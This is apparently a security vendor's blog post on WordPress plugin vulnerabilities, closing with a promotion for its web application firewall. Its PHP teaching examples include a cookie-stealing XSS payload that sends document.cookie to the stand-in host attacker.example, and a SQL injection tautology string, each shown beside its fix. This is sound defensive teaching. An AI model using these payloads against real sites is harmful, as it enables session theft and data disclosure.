16 Sep, 2019

More Than 230 Vulnerabilities in WordPress, Plugins and Themes in the First Half of 2019

WordPress is the world's most popular website software, making it the world's biggest target for attacks. The WordPress team works hard to catch and fix any issues, but there have been more than 230 vulnerabilities in plugins and themes so far this year.
WordPress is the world's most popular website software, and that makes it the world's biggest target for attacks. The WordPress team works hard to catch and fix vulnerabilities, so a site that keeps up with core releases is reasonably well protected as far as the core itself is concerned. The vast majority of sites, however, also run one or more plugins and a theme, and those are the easier target.

Plugins come from many sources, and some developers are far better than others at issuing security patches. Keeping plugins updated is a more complex job than updating the WordPress core: each plugin has its own maintainer and its own release schedule, and a plugin that has been abandoned or pulled from the directory simply stops receiving fixes, with no warning shown on the site. More than 230 vulnerabilities were reported in plugins and themes in the first half of 2019. Website security requires keeping every active plugin and theme updated. Ones that aren't needed or are no longer supported should be deleted, not merely deactivated: a deactivated plugin's files are still on disk and its PHP files are still reachable by URL, so a vulnerability in them can still be hit.

Downloads should always come from a trusted source. The publisher's own site or the official WordPress.org plugin directory is the surest source for an authentic, up-to-date copy; marketplaces such as CodeCanyon and vendors such as iThemes distribute their plugins directly from the developers. Less reliable sources can serve outdated versions or copies that have been tampered with: "nulled" copies of paid plugins offered for free are a well-known carrier of backdoors and spam injectors.
Cross-Site Scripting
The most common type of vulnerability is one that allows cross-site scripting (XSS). An XSS attack executes attacker-controlled JavaScript in the context of the targeted site, so the script runs with the same access to cookies, session and page content as the site's own code. In a plugin, the usual cause is output that echoes a request parameter, a comment, or a stored setting into the page without escaping it for the HTML context it lands in. The term is also used for similar attacks with other kinds of active content, such as Flash and ActiveX, but JavaScript is by far the most common vector.

Rogue JavaScript can alter nearly anything on a page. It can add an iframe, injecting the contents of an outside page. It can alter existing elements, replace images, change text, and add links. It can even redirect the whole page to a malicious site that looks almost the same as the real one. When the victim is a logged-in administrator, the script can also act with that administrator's session: changing settings, creating users, or installing further code.

Cross-site scripting can trick or force the user into unwanted situations, such as:

  • Downloading malware
  • Being shown fraudulent ads that link to dangerous sites
  • Being redirected to a phishing or malware site
  • Following links on the page that have been altered
Browsers and search engines try to spot compromised sites and warn visitors about them. The warning may save people from becoming victims, but when they see it, they'll leave the site and probably not come back. Malware detected on a site is likely to lead to blacklisting by Google Safe Browsing and similar services, and it can take days to get off the blacklist even after removing the dangerous content. The damage to reputation can be severe, and if the underlying vulnerability isn't fixed, more attacks will follow.
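The pattern behind most plugin XSS reports is output escaping that was simply never done. The following is an added example written for this article, not code from the original page or from any real plugin: a search box that echoes a URL parameter straight into the markup, beside the same box with the value escaped for the contexts it lands in. The function names, the sample payload and the attacker host are assumptions made for the illustration.

```php
<?php
// Added example, not code from the article or from any WordPress plugin.
// A reflected XSS bug of the kind common in plugins, beside the escaped form.

// Vulnerable: the search term from the URL is pasted straight into the page.
// In a plugin this is typically  echo $_GET['s'];  or an unescaped sprintf()
// into a shortcode's output.
function render_search_box_vulnerable(string $term): string
{
    return '<form method="get">'
        . '<input type="text" name="s" value="' . $term . '">'
        . '<p>Results for: ' . $term . '</p>'
        . '</form>';
}

// Hardened: every untrusted value is escaped for the context it lands in.
// htmlspecialchars() with ENT_QUOTES is what WordPress's esc_attr() and
// esc_html() do under the hood; inside a plugin, use those wrappers
// (esc_attr() inside attributes, esc_html() in text, esc_url() for hrefs).
function render_search_box_safe(string $term): string
{
    $escaped = htmlspecialchars($term, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<form method="get">'
        . '<input type="text" name="s" value="' . $escaped . '">'
        . '<p>Results for: ' . $escaped . '</p>'
        . '</form>';
}

// Constructed attacker input (hypothetical host attacker.example): it closes
// the value="" attribute and injects a script that leaks the visitor's cookies.
$payload = '"><script>new Image().src="https://attacker.example/?c="+document.cookie</script><"';

echo "Vulnerable output:\n", render_search_box_vulnerable($payload), "\n\n";
echo "Escaped output:\n", render_search_box_safe($payload), "\n";
```

Run it with `php xss_example.php` and compare the two outputs: in the first, the browser sees a closed attribute followed by a live `<script>` element; in the second, every `<`, `>` and `"` arrives as an entity and the payload is rendered as inert text. Escaping is per context: a value placed inside a JavaScript string or a URL needs a different escaper than one placed in HTML text, and HTML submitted by trusted users should go through wp_kses_post() rather than being allowed through raw.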
Other Attacks
Vulnerabilities in plugins can expose a site to other kinds of attacks as well.

SQL injection consists of submitting database commands through deliberately crafted URL parameters and form fields. Any code that builds a query from request input needs to keep that input out of the SQL text. Validating input helps, but it's easy to miss cases; the reliable fix is a parameterized query, which in WordPress means $wpdb->prepare() with %s, %d and %f placeholders rather than concatenating the value into the string. A suitably crafted attack against unparameterized code can delete data, change the database's content, or send confidential information such as password hashes and user e-mail addresses back to the attacker.
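To make the difference concrete, here is an added example (not code from the article or from any real plugin) showing the same lookup written with string concatenation and with a bound parameter. It uses an in-memory SQLite database through PDO so that it runs stand-alone; the table, its rows and the attack string are constructed for the illustration, and the WordPress equivalent of the safe form is noted in the comments.

```php
<?php
// Added example, not code from the article or from WordPress.
// Injectable query beside its parameterized form, on an in-memory database.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// Constructed sample data standing in for a plugin's own table.
$db->exec('CREATE TABLE subscribers (id INTEGER PRIMARY KEY, email TEXT, secret TEXT)');
$db->exec("INSERT INTO subscribers (email, secret) VALUES
           ('alice@example.com', 'token-a1'),
           ('bob@example.com',   'token-b2')");

// Vulnerable: user input becomes part of the SQL text. A single quote in the
// input ends the literal and whatever follows is parsed as SQL.
function find_subscriber_vulnerable(PDO $db, string $email): array
{
    $sql = "SELECT email, secret FROM subscribers WHERE email = '" . $email . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: the value travels as a bound parameter and is never parsed as SQL.
// The WordPress equivalent is
//   $wpdb->get_results($wpdb->prepare("SELECT ... WHERE email = %s", $email));
function find_subscriber_safe(PDO $db, string $email): array
{
    $stmt = $db->prepare('SELECT email, secret FROM subscribers WHERE email = :email');
    $stmt->execute([':email' => $email]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed attack string: closes the quoted literal and appends a
// condition that is always true, so the WHERE clause matches every row.
$payload = "nobody@example.com' OR '1'='1";

echo "Vulnerable query returns:\n";
print_r(find_subscriber_vulnerable($db, $payload));   // both rows, secrets included

echo "Parameterized query returns:\n";
print_r(find_subscriber_safe($db, $payload));         // empty: no such e-mail address
```

The vulnerable version ends up executing `... WHERE email = 'nobody@example.com' OR '1'='1'` and hands back every subscriber's secret; the parameterized version looks for an address that literally contains the quote and the OR, finds nothing, and returns an empty array. Two WordPress-specific caveats: $wpdb->prepare() only protects the values passed through its placeholders, so table and column names still have to come from a fixed whitelist, and a value used in a LIKE pattern should first go through $wpdb->esc_like() so that % and _ in the input don't widen the match.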
Cross-site request forgery (CSRF) tricks the browser of a logged-in user, such as a site administrator, into sending a request the user never intended; since the browser attaches the session cookie automatically, the site treats the request as that user's own. A successful forgery can post spam comments, create an account for the attacker, or change existing passwords and e-mail addresses. (The attacker can't read the responses, so CSRF is used to change things rather than to steal them.) WordPress provides nonces (wp_nonce_field(), check_admin_referer(), wp_verify_nonce()) to block this, but a plugin has to actually use them on every state-changing action.
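The nonce defence is worth seeing end to end. Below is an added example, not code from the article or from WordPress itself, that implements a nonce scheme in the style of wp_create_nonce()/wp_verify_nonce() in plain PHP so it runs stand-alone: the token is an HMAC over the action, the acting user and a time window, so a forged page that has the victim's cookie but not the token is rejected. The secret key, user ids, action name and timestamp are all constructed for the illustration; in a real plugin you would use wp_nonce_field() when rendering the form and check_admin_referer() before acting on the request.

```php
<?php
// Added example, not code from the article or from WordPress. A nonce scheme
// modelled on WordPress's: HMAC(tick | action | user), valid for the current
// and previous 12-hour window.

const NONCE_SECRET = 'example-secret-standing-in-for-wp-config-salts'; // constructed
const NONCE_LIFE   = 12 * 60 * 60;                                     // 12 hours

// The "tick" divides time into half-life windows; a nonce is accepted for the
// window it was minted in and the one after, so it lives 12 to 24 hours.
function nonce_tick(int $now): int
{
    return (int) ceil($now / (NONCE_LIFE / 2));
}

function nonce_for_tick(int $tick, string $action, int $userId): string
{
    return substr(hash_hmac('sha256', "$tick|$action|$userId", NONCE_SECRET), -12, 10);
}

// Binds action, user and time window together, so a token captured for one
// user or one form cannot be replayed for another.
function create_nonce(string $action, int $userId, int $now): string
{
    return nonce_for_tick(nonce_tick($now), $action, $userId);
}

// Returns 1 if minted in the current window, 2 if in the previous one, 0 if invalid.
function verify_nonce(string $nonce, string $action, int $userId, int $now): int
{
    $tick = nonce_tick($now);
    foreach ([1 => $tick, 2 => $tick - 1] as $age => $t) {
        // hash_equals() compares in constant time, so timing doesn't leak the token.
        if (hash_equals(nonce_for_tick($t, $action, $userId), $nonce)) {
            return $age;
        }
    }
    return 0;
}

// Simulated handler for a privileged action. The nonce proves the request came
// from a form the site rendered for this user; a capability check (in WordPress,
// current_user_can()) is still needed to prove the user may perform the action.
function handle_delete_post(array $request, int $loggedInUser, int $now): string
{
    $postId = (int) ($request['post'] ?? 0);
    $nonce  = (string) ($request['_wpnonce'] ?? '');
    if (!verify_nonce($nonce, 'delete_post_' . $postId, $loggedInUser, $now)) {
        return 'rejected: bad or missing nonce';
    }
    return 'deleted post ' . $postId;
}

$now   = 1568592000;   // constructed timestamp (16 Sep 2019)
$admin = 1;            // constructed user id of the logged-in administrator

// Legitimate submission: the site rendered the nonce into the form for user 1.
$form = ['post' => 42, '_wpnonce' => create_nonce('delete_post_42', $admin, $now)];
echo handle_delete_post($form, $admin, $now), "\n";    // deleted post 42

// Forged request from an attacker's page: the victim's session cookie is sent
// automatically, but the attacker cannot compute the nonce.
echo handle_delete_post(['post' => 42], $admin, $now), "\n";   // rejected

// A nonce minted for another user (id 2) or another action does not transfer.
$stolen = ['post' => 42, '_wpnonce' => create_nonce('delete_post_42', 2, $now)];
echo handle_delete_post($stolen, $admin, $now), "\n";  // rejected

// The same nonce is still accepted 12 hours later, but not after 24.
echo verify_nonce($form['_wpnonce'], 'delete_post_42', $admin, $now + 13 * 3600), "\n"; // 2
echo verify_nonce($form['_wpnonce'], 'delete_post_42', $admin, $now + 25 * 3600), "\n"; // 0
```

Two points the example makes that plugin code often gets wrong: the nonce has to be checked on every request that changes state, including AJAX and REST handlers and not just the visible settings form, and passing the nonce check is not an authorization check, so the handler must still confirm the user's capability before acting.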
Mutation XSS (mXSS) attacks rely on differences in how browsers parse and re-serialize HTML: markup that a server-side sanitizer considers harmless can be "mutated" into executable script when a particular browser rebuilds the DOM from it. A page may be safe with the browsers it's been tested on, but not with others, especially older ones still running on computers and operating systems that can't upgrade to the latest version.
Keeping Plugins Updated
Some hosts will automatically download and install all updates for a site's plugins. In most cases, though, it's a manual procedure, and not a difficult one. If plugins need updates, the WordPress admin dashboard shows them: the sidebar entry for "Plugins" carries a number in a circle, indicating how many plugins have updates available. Clicking on "Plugins" lists them individually and lets the administrator update each one.

It's always wise to back up the site (files and database) before doing an update. Updating is almost always safe, but occasionally the latest version changes functionality: the site may not be able to do everything it did before, or it could even break completely. The choice then is to roll back to the backup or to remove the troublesome plugin until a solution is available. Check the release notes to see what has to be done.

With some sites, it's necessary to download the plugin as a ZIP file, unpack it, and upload the folder to the site's wp-content/plugins directory, replacing the old copy. This happens when the hosting provider restricts file access in a way that keeps WordPress from writing to its own files. Use SFTP or FTPS rather than plain FTP, which sends the site's credentials in the clear, and make sure the uploaded files end up with the same owner and permissions as the rest of the plugins. Doing it this way is a little harder but not an onerous task.

Administrators should check at least once a week for plugins that need updating, and sooner when a security advisory for one of their plugins is published.
Keeping Plugins Lean
Site administrators shouldn't be afraid of installing useful plugins, but they should keep the number low and not install them just because they look interesting. Each one adds attack surface and another update to track.

It's often possible to add features using built-in widgets and blocks that don't require any plugins. They may not be as fancy as what the plugins offer, but they need no separate maintenance.

Use plugins if they add value to your site, but not otherwise. That way you'll keep them manageable.
Protection with ThreatSign
Because of its complexity and the large pool of plugins, WordPress will always have new vulnerabilities. Keeping a site up to date is vital.

Even with a strong updating policy, there are risks. Zero-day attacks can hit a site before the vulnerability is general knowledge. Even once a vulnerability is publicized, there's a window between the announcement and the availability of a fix, and another between the fix and its installation on each site.

The ThreatSign Web Application Firewall from Quttera monitors traffic to your WordPress or PHP website and filters out malicious requests. It can block exploitation attempts against a vulnerability before a patch is available, buying time to update, and it uses the latest threat intelligence to keep its protective measures current. Cross-site scripting and SQL injection attempts that match known attack patterns are stopped before they reach the application.

Website security requires protection at multiple levels. No single measure can stop every attack. The combination of the ThreatSign WAF and the diligent maintenance of the site's software will keep the large majority of attacks from doing any damage. The result is higher uptime levels and greater safety for users.